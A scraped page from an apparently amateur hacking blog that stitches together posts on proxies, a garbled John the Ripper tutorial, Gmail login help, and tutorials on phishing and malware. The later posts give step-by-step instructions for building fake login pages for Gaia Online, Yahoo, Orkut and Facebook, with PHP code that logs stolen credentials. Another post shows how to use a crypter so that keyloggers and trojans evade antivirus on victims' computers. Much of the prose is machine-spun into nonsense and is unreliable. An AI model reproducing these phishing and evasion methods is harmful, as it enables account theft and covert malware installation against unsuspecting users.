Design your theme

Showing posts with label Learn Haking Biggest Ever Collection More Than 500 Posts. Show all posts
Showing posts with label Learn Haking Biggest Ever Collection More Than 500 Posts. Show all posts

How do I hide my IP address?

The most common method to hide your IP address is to use a proxy server in one form or another. A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server and then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
There are several implementations of proxy servers that you can use to hide your IP address (in an attempt to remain anonymous on the internet):

Website Based Proxy Servers

A Website based proxy server is a website that provides a form for you to enter the URL of a website that you wish to anonymously visit. When you submit the form the website proxy server makes a request for the page that you want to visit. The machine usually does not identify itself as a proxy server and does not pass along your IP address in the request for the page. The features of these sites vary (ad blocking, javascript blocking, etc) as does their price. Some are free and some charge. Examples of website proxy services are:

Browser Configured Proxy Servers

There are also stand alone proxy servers that allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow.
There are a variety of types of these proxy servers:
  • Transparent Proxy
    This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.
  • Anonymous Proxy
    This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.
  • Distorting Proxy
    This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.
  • High Anonymity Proxy
    This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.

Installed Software Proxy Servers

There are a variety of companies and software packages available at either a onetime cost or at an annual subscription. These are usually faster and more reliable than the above proxy servers. Some of these services would include:
VPN Services
A virtual private network (VPN) protects your data and identity over public networks, like the Internet and wireless hotspots. Various protocols are used to create an encrypted tunnel that transports data securely. While a firewall may protect the data on your computer, a VPN will protect your data on the Internet. The goal of a VPN is to implement the same level of security provided by private networks at substantially lower costs. VPN services provide different gateway cities where the IP address assigned to your computer is located. This allows users to access websites only available to users from a certain country. This application is particularly important for travelers who need to access websites from their home country and for people living in regions rife with censorship, like China and Iran.

Note: This procedure changes the IP address of a computer on a wired or wireless network. If you want to change the IP address of your internet connection, you should contact your service provider, as they're the ones who exert control over this.

http://i655.photobucket.com/albums/uu276/r_manic/Change-Network-IP-Address-Windows.png

To change your network IP address in Windows XP, Vista, or 7:

1. Press the Windows Key and R

2. Type command and press Enter. This loads your DOS prompt

3. Type ipconfig /release then press Enter. This disables your internet connection

4. Go to your desktop, and right-click on something called Network Place or My Network Places (If you're using Windows Vista or 7, look for the Network and Sharing Center through Control Panel)

5. Click Properties. You should now see something called Local Area Connection or something similar

6. Right-click on your connection (titled Local Area Connection if you're using an ethernet cable or Wireless Network Connection if you're on WiFi) and click Properties

7. Under the General tab, double-click on the Internet Protocol (TCP/IP)

8. A new window appears. On its own General tab, click the box beside Use the following IP address

9. Type in ones until you fill the box up (it should read 111.111.111.111)

10. Press Tab. You'll notice the Subnet Mask section automatically fill sup with numbers

11. Click OK

12. Click OK to bring you back to the "Local Area Connection" screen

13. Right-click Local Area Connection and Click on Properties again

14. Again, under the General tab, double-click on the Internet Protocol (TCP/IP)

15. Select Obtain an IP address automatically

16. Click OK

17. Click OK

18. Go back to your DOS prompt, type "ipconfig /renew" and press Enter. This restores your internet connection.

By now, the network should've assigned a new IP address to your computer automatically.

John the Ripper is probably the fastest, most versatile, and definitely one of the most popular password crackers available. It supports six different password hashing schemes that cover various flavors of Unix and the Windows LANMan hashes also known as NTLM ( used by NT, 2000, and XP ). It can use specialized wordlists or password rules based on character type and placement.

I got profuse Emails from my blog readers requesting me to record an article on how to use john the ripper, But in truth qualified are may hunky-dory tuts on the snare on this subject. Inasmuch as i taught instead of writing i can share one comparable article The following article is written by Renegade

image

John The Ripper Tutorial

I wrote this tutorial as crowing I could to shot to disclose to the newbie how to operate JTR. Master, this is a newbie tutorial, ergo I wont go into detail keep secret all of the individualism. JTR is a program that decrypts Unix passwords using DES ( Data Encryption Standard ).

The Process

Step 1: Download John The Ripper By Hackerstips.tk

Download_button

Step 2: Extract JTR. Command windows use winzip. Prominence unix type macadamize - xzf john - 1. 6. concrete. gz

 

Step 3: Significance windows ajar the command prompt. Birr to the Origin chuck, drift Tear, type ' command ' ( no quotes ) and press enter.

You obscure me? Satisfactory. Snap to whatever directory to keep JTR force. Type ' john ' and press enter. A full guide of options will come up:

John the Ripper Adventure 1. 6 Copyright ( c ) 1996 - 98 by Solar Designer
 



Usage: / WINDOWS / DESKTOP / JTR / JOHN - 16 / Dart / john [OPTIONS]

[PASSWORD - FILES]
- single " single crack " mode
- wordfile: FILE - stdin wordlist mode, scan words from FILE or stdin
- rules enable rules for wordlist mode
- incremental[: MODE] incremental mode [using section MODE]
- out: MODE independent mode or consultation filter
- stdout[: LENGTH] no cracking, rigid note words to stdout
- restore[: FILE] restore an interrupted talk [from FILE]
- confrontation: FILE set gig file eponym to FILE
- status[: FILE] chalk position of a concourse [from FILE]
- makechars: FILE originate a charset, FILE will imitate overwritten
- shine program cracked passwords
- investigation perform a benchmark
- users: [ - ]LOGIN | UID[,.. ] load this ( these ) user ( s ) onliest
- groups: [ - ]GID[,.. ] load users of this ( these ) parcel ( s ) isolated
- shells: [ - ]SHELL[,.. ] load users camouflage this ( these ) shell ( s ) isolated
- salts: [ - ]COUNT load salts veil at headmost COUNT passwords unrivaled
- format: Moniker beef ciphertext format Place name
( DES / BSDI / MD5 / BF / AFS / LM )
- savemem: Unfluctuating enable retentiveness saving, at In line 1.. 3



 You wont use most of these options. Effect fact, you don ' t absolutely demand department of these options. You can cleverly type ' john [filename] '. The filename commitment include the. txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you ' re an impatient ass you can use a word list. This is not as effective but it ' s quicker ( more on that later ).

How to make a crackable file: Let ' s say that for some reason you have a DES encrypted password but no file. If you want to crack it ( why else would you be here? ) you need to make your own file. Just create a text file and paste in the password. Now put a username ( just any old name will do ) in front of it with a colon separating the two. It should look something like this:

User: gyuJo098KkLy9 

Save the file as crackme. txt ( just an example ) and go to the prompt and type ' john crackme. txt ' ( no quotes obviously ). Now you just have to wait.


Options

Here are a list of the options and what they do.


single:

Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.
Usage: john - single crackme. txt


wordfile:

Uses a wordlist ( basically a dictionary attack ). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default ( bruteforce ) attack, but I don ' t recommend this because it doesn ' t always find a match. More notes on wordlists below.

 Usage: john - wordfile: password. lst crackme. txt


 rules:

Lets you define the rules for using wordlists. I don ' t use wordlists, so if you want to use this option I wont help you. Ok, ok, I ' m just lazy. Shoot me.


 incremental:

I like this method. It allows you to do a brute force attack
under certain modes.
Usage: john - incremental: alpha crackme. txt ( only letters )
john - incremental: digits crackme. txt ( only numbers )
john - incremental: lanman crackme. txt ( letters, numbers, and some special characters )
john - incremental: all crackme. txt ( all characters )

 

external:

This is a little complicated, so if you are lame don ' t mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn ' t recommend it unless you know what you ' re doing. No, I wont tell you how, go away.
Usage: john - external: [MODE] crackme. txt ( replace MODE with whatever the
name of your mode is ).


restore:

Ok, let ' s say that you need to stop the crack in the middle. Press crtl + break. A file will be created in the JTR directory named ' restore ' ( no quotes doofus, and yes, no file extentionfilename.
 Usage: john - restore: restore


session:

Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.
 Usage: john - session: [save to filename] crackme. txt


status:

Shows how far you got before stoping a crack ( provided you used the - session option ).
 Usage: john - status: [filename]


 show:

Shows how many passwords have been cracked in a file and how many are left.
 Usage: john - show crackme. txt


 

test:

Shows how fast JTR will work on your computer.
 Usage: john - test


users:

Cracks the password only for the user or users you tell it to.
 Usage: john - users: User crackme. txt


 groups:

Cracks the passwords only for the group or groups you tell it to.
 Usage: john - group: lamers crackme. txt


shells:

Cracks the passwords only for the shell or shells you tell it to.
Usage: john - shells: shelly crackme. txt


salts:

Cracks the salts that have at least the number of passwords you specify.
Usage: john - salts: 2 crackme. txt

format: JTR can decrypt many from many different formats, not just DES ( but this is the most widely used one ). Use this to force JTR to try a certain format.
Usage: john - format: DES crackme. txt ( force DES )
john - format: BSDI crackme. txt ( force BSDI )
john - format: MD5 crackme. txt ( force MD5 )
john - format: BF crackme. txt ( force BF )
john - format: AFS crackme. txt ( force AFS )
john - format: LM crackme. txt ( force LM )



 savemem:

this tells JTR to automatically save your process at whatever
level you specify from one to three.
Usage: john - savemem: 1 crackme. txt ( save at level 1 )
john - savemem: 2 crackme. txt ( save at level 2 )
john - savemem: 3 crackme. txt ( save at level 3 )

How to use a wordlist with JTR: I ' ll assume you already have a wordlist in the JTR directory ( it comes with password. lst, if you want to make your own I ' ll tell you how later ). Go to the prompt and type ' john - wordfile: password. lst crackme. txt ' ( no quotes, damnit ). If the password is in the wordlist, it will work. Otherwise, you deserve it for using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:
#! comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
password
123456

The top line is a comment ( duh ). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one ( once again, I ' m far too lazy to give you a link ). It may or may not already be the right file format (. lst ). If it isn ' t, just go to the prompt. Assuming the filename is lazy. txt, type ' rename lazy. txt lazy. lst '

Piping Output: Remember the - show option? You can get JTR to save that
output to a file. Just type ' john - show crackme. txt > crackinfo. txt '



 There ' s my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long as they don ' t clash. Play around with it a while.

Q: What does " Loaded 0 passwords " mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it wont work. If your password file isn ' t made right it wont work.

Q: What does " Password files required, but none specified " mean?
A: Can you read? You can ' t just tell JTR to crack, you need to give it a file.

Q: What does " Unknown cypher text format name requested " mean?
A: When you use the - format option you need to check that you typed the name of the format correctly.

Q: How come when I typed ' john - users: login | uid crackme. txt ' ( which by the way is the usage shown in the list of option by JTR ) I received this error:
Option requires a parameter: " - users: "
Bad command or file name
A: The piping symbol you used ( | ) can mean two different things. In this case in means ' or '. You ' re supposed to use login OR uid. When you type it in a dos window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.



,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Enjoy This Great Hacking Tutorial,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

            Please give this a thumbs up and support me by subscribing to my channel!!!



Gmail Login,Gmail Id, Gmail Page, Gmail Account, Gmail Chat, Gmail Login Page,Welcome To The World Of Gmail (From Hackerstips)



There are basically two ways to log into Gmail. Either by using the Gmail web interface that is available for most users at Gmail.com or by accessing Gmail remotely using desktop or mobile email clients. Both methods have their advantages and disadvantages.

A Gmail login at the website is not bound to a specific location, users can be anywhere and access their email account if they have a connection to the Internet there. Remote clients, like the desktop email programs Outlook or Thunderbird, on the other hand offer other advantages. Emails can be accessed even without an Internet connection for one. They can also be stored locally and not on a remote server, which provides access to them even if no Internet connection is available.img_131262_gmail-logo
One of the main problems users of the Gmail web interface face is that there is not a good way to switch Gmail accounts or log into two accounts at the same time. The second problem can easily be fixed with the privacy modes that most web browsers come with (or plan to implement). Privacy mode work independently from the rest of the Internet browser which means that it can be used to log into Gmail separately.

Gmail login
image

The Grease monkey script Google Account Multi-Login is another possibility. While it does not offer simultaneous Gmail logins it provides an easier way to switch between Gmail accounts directly in the web interface.
Gmail Account Login Troubleshooting
A user with login problems has to access the situation in detail.
· Is the Gmail website loading?
· Are username and password of the email account accepted?
· Does the Gmail page list an error message?
There are certain “best practices” when dealing with log in problems at the Google Mail website(the correct url is actually https://mail.google.com). The first is to ensure that the website is loading properly. This can be done by clearing the Internet cache or trying another web browser to access the Gmail homepage.
Open your favorite web browser and enter http://mail.google.com/ into the address bar. Is Gmail loading or is the page showing an error message or remaining blank? It may help to clear the browser cache and try again, or to use another web browser to log into the email service. Browsers to try include Firefox, Opera or Google Chrome (The Fastest Web Browser Provided By Google) Chance is that a firewall, router or computer virus are blocking access to Gmail on the computer.
A last resort would be to try another computer to see if the Google Mail website opens on that PC.
A forgotten username and password on the other hand, or usernames and passwords that are not accepted by the Gmail login page usually require filling out a help document to make Gmail resend the data so that the Gmail account can be accessed once again.


The cannot access my account page aids the user in retrieving the relevant account information.

Direct Links
· Gmail Homepage with login form, go here.
· If you forgot your password go here
· If you forgot your username go here
· If your account has been compromised go to the account recovery form here
Further information are available at the Gmail login page at the Login Helper website.
Gmail users need to assess the situation in detail, before they can troubleshoot it. The guide should have made it clear that there are different possibilities why a Gmail account cannot be accessed by a user.


Google users who have fixed their Gmail login issues are encouraged to share their experience with other users to aid them in resolving the login issues on their end.

Updates


Google has introduced the new 2-step verification option to improve the security during log ins. The new feature utilizes smartphones that generate or receive a temporary code that needs to be entered during the Gmail login. This basically adds a second layer of defense to the sign-in process so that attackers need to get hold of the username and password as well as the one time code. Gmail users can configure the 2-step verification under their Account Settings. It is recommended to add a backup phone or backup in case the phone gets lost or stolen.


gmail







I received huge amount of email and readers asked me that is there any way to avoid antivirus detection while installing a keylogger remotely.so today i will tell you about a software,by which you can bypass antivirus detection while installing a Key Logger remotely 
Bypassantivirus1-1-1
How to bypass antivirus detection - UD Crypter



This Crypter is UD (Undetectable) and not FUD (Fully Undetectable) free software, because it is detected by Avira antivirus and even Kaspersky antivirus as virus. Hence, it is 2/22 UD ie only 2 antiviruses out of 22 detected this as virus. Thus, if your victim is using any antivirus other than Avira and Kaspersky, then chill out guys.. here's the solution for your problem.
Download UD Crypter software:
As I have explained previously, Crypter is used to bypass antivirus detection on victim computer. So, we use Crypter software to encrypt our Keylogger and Trojan. Due to encryption by Crypter software, whenever victim runs our sent keylogger or Trojan on his computer, his antivirus does not detect our keylogger as virus and our keylogger is prevented from being deleted on victim computer.


1.First of all Download Ud crypter


Download_button

2. extract the Zip file to obtain FUD Crypter free software.

3. Run Krypter.exe application on your computer system.

4. Now, browse to the file (keylogger or any trojan) you wanna crypt to bypass antivirus detection and hit on "Encrypt".

5. A new file will be created in same directory. Now, scan this file with your antivirus and it will not detect any virus (except Avira and Kaspersky).
Note: You may get certain error on your computer like this:
image

If you are getting this error, install Library file package to fix this error.(Try googling)
I hope now your are able to use this UD Crypter to crypt keylogger or trojan
and bypass antivirus detection




Warning: This column (Post) is for educational purposes only, This column is just to allegorize how hackers can drudge your gaia online accounts.
Gaia Online is an English-language, anime-themed amusing networking and forums-basedwebsite. It was founded in 2003 as Go-Gaia.com,[1][2] but the name was afflicted to GaiaOnline.com in 2004 by its owner, Gaia Interactive.Gaia online has now become actual acclaimed online hangout, accumulation amusing networking, forums, gaming and a basic world,therefore it has become ambition of ample bulk of hackers,in this commodity i will acquaint you How to drudge gaia online accounts or Hacking gaia online account.


The adjustment i will acquaint you has a lot of success amount than any added method,the adjustment is alleged phishing and it is the arch adjustment to drudge gaia online accounts
Phishing:
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and creditcard details by masquerading as a trustworthy entity in an electronic communication.The most common method used in phishing are Fake login pages.On this method the hacker creates a fake page which exactly resembles with gaia.com,and when victim enters his/her password he gets his gaia account hacked
Know more about phishing:

Method:

1.Download Gaia Phishing site creator software to make a  gaiaonline.com phisher site 
2.Now extract all the contents into a folder
3.Now you will have something like this:



image
4.Just fill in www.gaiaonline.com in url field and provide the destination folder in which gaiaonline should be saved. Just hit on "Create Phisher" to make gaia phishing site.
5. You can also use "Redirection Url" to redirect victim to desired url after he logs in with our gaiaonline phishing site.

6.Now just Create an id in www.110mb.com,www.ripway.com or t35.com or any other webhosting site like http://hackerstips.blogspot.com/2011/06/free-website-hosting-site-list-how-to.html
6.Then upload the contents into a directory
7.For that after creating an id you should go to file manager and upload all these files.
8.Then just got to gaia.htm and try out whether its working .
After you type the file , a password file named pass.txt will be created in the same directory .
you can see what username and password you have entered.
9. Distribute the gaia.HTML URL (ie: yoursite.com/gaia.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.


            Please give this a thumbs up and support me by subscribing to my channel!!!





A Affected (Fake) Login Page is a page that absolutely resembles the original login page of sites like Yahoo,Gmail etc.However, these Affected login pages are created just for the purpose of burglary other’s passwords.


Update:Jotform.com have changed their policies so you cant make fake page without a premium account.I am Going To Post On"How to hack gaiaonline accounts"
In my last post hack Orkut using fake login page i showed you to create fake login page of Orkut
But i was asked by many others that what about other sites, How would i create fake login page for other sites such as orkut,  Facebook,  myspace,  gmail and etc
But i was asked by abounding others that what about added sites, How would i actualize fake login page for added sites such as orkut,facebook,myspace,gmail and etc


So in this Post i will appearance adjustment to actualize Affected login page for adapted site:
How to actualize affected login page - Procedure?
Now it's simple to body a Affected Login Pages afterwards any ability of Programming Languages. One can use http://www.jotform.com to body the Assurance Up page.
{1} Open www.jotform.com and Sign Up.

{2} then Login there with your newly registered account.

{3} now click on ‘ Create your first form’.

{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)

{6} Now Click on ‘Power Tool’ Option (In right hand side…)

{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’

{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)

{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.

{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.

{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here

{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
Now you can appearance it by accounting the url in the abode bar.
NOTE: If u wish to forward it to the internet, again aboriginal you will accept to actualize a hosting annual which you can actualize on www.110mb.com and YOU can search for it
http://hackerstips.blogspot.com/2011/06/free-website-hosting-site-list-how-to.html



http://hackerstips.blogspot.com/2011/06/top-10-web-hosting-companies-of-2011.html



I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url of the file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.














Create Fake Login Page For Yahoo|Hack Yahoo By Phishing



1.First go to Yahoo’s login page “https://login.yahoo.com/config/login_verify2?&.src=ym”

2.Right click on the page and go to “View Page Source”.


3.You will see the whole HTML coding in it of the page(Huge huh ?).

4.Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C

5.Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Yahoo.htm’

6.Then you have to make a login.php file.For that, open another text document and paste the
following HTML code in it

<?php /* Created on: 3/27/2009 */
$fp = fopen(“YahooPasswords.htm”, “a”);
fwrite($fp, “Email:$_POST[ID name="***"]\tPassword:$_POST[PASS name="***"]“);
echo “<HTML>

<head>
<title>hackerstips</title>

<FRAMESET cols=\”*\”>

<FRAME SRC=\”http://www.hackerstips.blogspot.com\”>


</FRAMESET>”;?>

In this Code Change only the following ie. if you want to change it

a.”YahooPasswords.htm”

b.”<title>Hackerstips<title/>”

c.”http://www.hackerstips.blogspot.com\” but don’t forget ‘\’ after the destined URL.

d.”3/27/2009″

e.”Email:” & “Password:”


7.Then save this document as ‘Login.php’.

8.Now to got to ‘Yahoo.htm’ and find (CTRL+F) ‘action’.

9.You will find something that likes like this action=”https://login.yahoo.com/config/login?” .


10.Change it to action=”/login.php”

12.Now find ‘Yahoo! ID’ and in the next line or near it you will find name=”login” (see closely)

So,here the id is ‘username’.(if ‘id’ does not exist then take the id=”**” or make a name=’**’ ,it is always there in
in yahoo)

13.Now, go back to login.php and replace ID name=”***” with ‘login’ (since name=’login’)




14.Find ‘Password’ and in the next line you will find name=’passwd’.So the name is ‘passwd’.Replace it with PASS name=’passwd’ with ‘passwd’


NOTE: Do not include ‘ in login.php.For example Email:$_POST[login

15.Save both the files.




16.Upload them into any free hosting website like t35.com.Do not upload them into a directory!

17.Then to test it just type in some usename and password.

18.Refresh the control panel (the place where you uploaded the files) and them you will find
‘YahooPasswords.htm’ which is created and when you open it you will find the username and password that you entered.







Today, in this column I would be advertence the easiest way to actualize a affected login page of Orkut.
A affected (Fake) login page is a page which looks akin the login page of a site. And if anyone logs in through the affected login page, his/her annual advice is logged in a book and the hacker or the architect of the affected login page retrieves that information.

image
Preview:(Click to enlarge) Easiest Steps to Actualize (Create) a Affected Login Page:
1. Download this Affected Login Page for Orkut over here- Download – 5.32 MB


2. Extract its capacity application WinRAR.
3. You will get a binder called “OFPFP” which contains
mailer.php, confirm.html,google_transparent.gif & login.txt




4. Now what you accept to do is, acquisition a webhost annual (Service) and upload these files to it.


5. After you upload your files to the webhost, your affected login page is ready. But be abiding not to rename any of those files.



6. The hotlink to the page confirm.html will be the URL of the Affected Login Page, area you accept to forward your victim and acquaint him to login through there.


7. The annual advice (username and password) will be stored/logged in login.txtfile.





These Steps Are For Creating Orkut Affected Login Pages Not For Any Added Site.



Note: We don't abutment bent hacking. This column has been accounting with a absolute mind, to just accept some fun with your friends. Amuse don't accomplish a amiss use of this. You will be captivated amenable for whatever you do application this Affected Login Page. And aswell if the website on which you created Affected Page will accuse to badge or any added annual like that, we wont be amenable for that too.


Enjoy accepting fun with your accompany by tricking them into this trick!!!!







            Please give this a thumbs up and support me by subscribing to my channel!!!




Facebook Fake Login Page/Fake Login Script !
1.jpg.scaled500
Are you curious to “hack Facebook password” well then this post is just for you,Most people ask me to tell us the easiest way to hack Facebook password,so here are some ways to hack Facebook password:
1.Facebook phishing
2.Key logging
3.Facebook new features
4.virus
But i will explain you the method which has a great success
Update:Due to recent complains i have elaborated the post and change the login script to hack Facebook password please check it out
Today we will focus on the But i will explain you the method which has a great success rate and is very easy to use i.e Phishing or fake login page
Fake login page


A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc..
However, these Fake login pages are created just for the purpose of stealing other’s passwords.
To learn more about Facebook hacking, You may click the Image below :
PROCEDURE:
First Of All Download Facebook Fake Login Page Here 
http://www.ziddu.com/download/15462715/Facebookfakepagehackerstips.rar.html










1.once you have free downloaded Facebook fake login page now extract contents in a folder


2.In that. open “pass.php” and find (CTRL+F) ‘http://www.hackerstips.blogspot.com‘ then change it to ’http://www.Facebook.com‘


Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to http://www.facebook.com


Now Save it.


3.Open Fake page in wordpad


4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php


5.Create an id in www.110mb.com,www.ripway.com or t35.com


6.Then upload the contents into a directory


7.For that, after creating an id you should go to file manager and upload all these files.


8.Then just got to Facebook.htm and try out whether its working


After you type the file , a password file named pass.txt will be created in the same directory .


you can see what username and password you have entered.


9. Distribute the Facebook.HTML URL (i.e.: your site.com/Facebook.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.








facebook hack







Facebook Hack – View photo albums of non-friends



A new Facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.


image


By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.













How To Delete Your Hacked Facebook Profile


Today, I was browsing some of the hacking sites and found an interesting link there which lead me to an info about deleting a hacked Facebook profile and therefore I am here to share it with you all. It is a quite long procedure and a time consuming one but you need to follow it for your hacked account and might want to use it to disable your Facebook profile and save yourself from getting more humiliated or harmed if the person who hacked it is using it for a negative purpose. I hope you all will like it. Enjoy!

This tutorial is not really a
Facebook hacking tutorial and it is only for educational purpose. I advice you to use it wisely and not for harming and deleting other profiles which you should not.




Things you will need


  • Your hacked profile’s link
  • Email which you used to sign in with
  • Your birth-date
  • New email id if you are not able to login to your previous one


Procedure to follow


  • Visit this link
  • Enter the email in the first block which you used to sign in with
  • Enter the new email address in the other field where you will receive a confirmation mail
  • Reply to the confirmation mail describing that your profile has been hacked by ABC person and you would like them to disable the profile completely and add some more description about the activity going on from your profile.
  • After sometime, you will get one more confirmation mail asking if you are able to access your email or not. Reply negatively.
  • In a day or two, you will have your account disabled and feel free to make a new one.


P.S. This is not a real Facebook Hacking and you should not try it for playing pranks on others. Please feel free to comment below if this tutorial have helped you Have a nice time ahead.

















Facebook Drudge Codes & Tips



Facebook codes are appropriate signs, some humans alarm them symbols. Beside codes, there are Facebook hacks codes and tips that can be actual useful. Note that in Facebook there are no “hack or bluff codes” but we blazon it just to draw your absorption on this article. Facebook hacks accept not abide because affair in Facebook is alteration anniversary and every second. This will acquaint Facebook enthusiasts to analysis this tips that are not accessible on aboriginal sight.





Konami codes







This konami codes are one of the coolest.They are generally some affectionate of babble that is acclimated in old Konami video games. This tip is one of the easiest to implement. To use Konami acclaimed code, you charge on your Facebook home page do this arrangement of strokes:


Up + Up + Down + Down + Larboard + Appropriate + Larboard + Appropriate + B + A + Enter


or


↑ + ↑ + ↓ + ↓ + ← + → + ← + → + B + A + Enter


After you type it, you will have cool effects when you scroll page or write something into your Facebook chat


image


Facebook pirate profile






As you apparently know, anniversary Facebook user can transform pages in any language.In lower left corner of your profile page, you can see current language settings. When you click on this, you will get all language availabe. If you take a better look you can notice English (pirate) language as it is on picture.


image


When you choose this language, you will see some hilarious variations like Ahoy!, Th’ infamous landlubber, Th’ wench, Cast ye eye on the ‘istory books, Spy on Yer Cap’ns Log, pleasin’ to me eye, blabber t’yer mates, etc. Also, if you go to your profile, you can see that wall is now Plank, profile Cap’n’s Log, applications Treasure Chest, etc. I like this “language” and I hope that you like it too.


Upside down status







If you’ve been on Facebook long enough, you’ve probably noticed a few people posting upside down status updates. They sure do think they’re clever don’t they?!  Yes, you too can be the envy of all of your friends and family by posting your updates so that people have to look silly by tilting their heads upside down so they can read it.


Most of the people you’ve seen doing this have likely installed a Facebook app just to do so. However, I dislike installing apps because you always have to provide permissions to those applications to access your profile. A better approach is to use the free online application at Flip Text to generate your upside down status update.


image


Be online on chat for some people, but offline for others


Look, don’t feel bad about it. When I first joined Facebook I left my online status wide open. After a couple of weeks of getting inundated with nonstop chat requests, I simply turned off my online status completely. Problem solved. Except, there really were certain people I wouldn’t mind hearing from – is it really fair for a few chatterbox buddies to ruin your chances for communicating with everyone? Well, there is a way for you to selectively block your online status from certain people.


image


All you have to do is open up your chat icon in the lower right corner of your Facebook display, click on Friend Lists, and create a new list called “Block List.” Make sure after you create it that it’s configured under “Display these lists in Chat.”


image


Now, all you have to do is either click “edit” and add the friends you want to block, or if they’re already online, just click their name and drag them under this new list. Once you’ve got everyone there who you want to block from see your online status, hover your mouse over the green dot to the right and click on “Go Offline.” Now, you appear offline to only those certain friends.


Firefox has one very cool plug-in FacePAD.





Facebook, unlike MySpace, is not really easy to tweak – which is actually a good thing. Gone are the days of those horrid eye-bleeding pages with pink flashing backgrounds and instant music that you can’t turn off. However, the tweaks and plug-ins in the list above offer at least a few ways to customize your Facebook account and usage to suit your life and your personality.


How do you use Facebook? Are there any hacks or add-ons not offered here that you especially like to use? Share them in the comments section below!


I hope that you like this little trick. Also use techniques to view private Facebook profile to see profile of targeted person that doesn’t know you.


Download photo albums from friends’ profile


This is really great tip that helps you to download whole albums, not pictures one by one and save your time. Before you started with this plug-in, locate albums that you want to download with effective picture search on Facebook. Firefox has one very cool plug-in FacePAD.



imageimage


After you install it, you may assure that plug-in has correct Facebook language as you need it to have. Then, you need to download album with right click on your mouse and left click on “Download Album With FacePAD” as it is on picture. So that’s it. Now you have all album downloaded in a second.


 


Make your Facebook status new and when you away from internet



Schedule Facebook Status Updates With Sendible


Do you like to keep your Facebook profile active, but you’re coming down with a cold and may be offline for a few days?  Maybe you’re taking a trip and won’t be anywhere near a computer for a week. Or maybe you’ll be playing hooky from work and traveling, but you want your colleagues and boss to think you’re stuck at home sick. Accomplish any of these wishes by using Sendible to schedule your Facebook status updates. This is an application Daniel covered earlier, so check out his article for more details.


But for Facebook specifically, once you sign up with Sendible, just click on Facebook and provide your Facebook login details. Sendible connects directly with your Facebook account. The, under “New Messages” click on “Status Updates“.


image


On the next page you can schedule out as many updates as you’d like! This service is awesome – and you can distribute scheduled updates to a number of social networks including MySpace, Blogger, Twitter and more.




Total Pageviews

Recent Comments

Recent Posts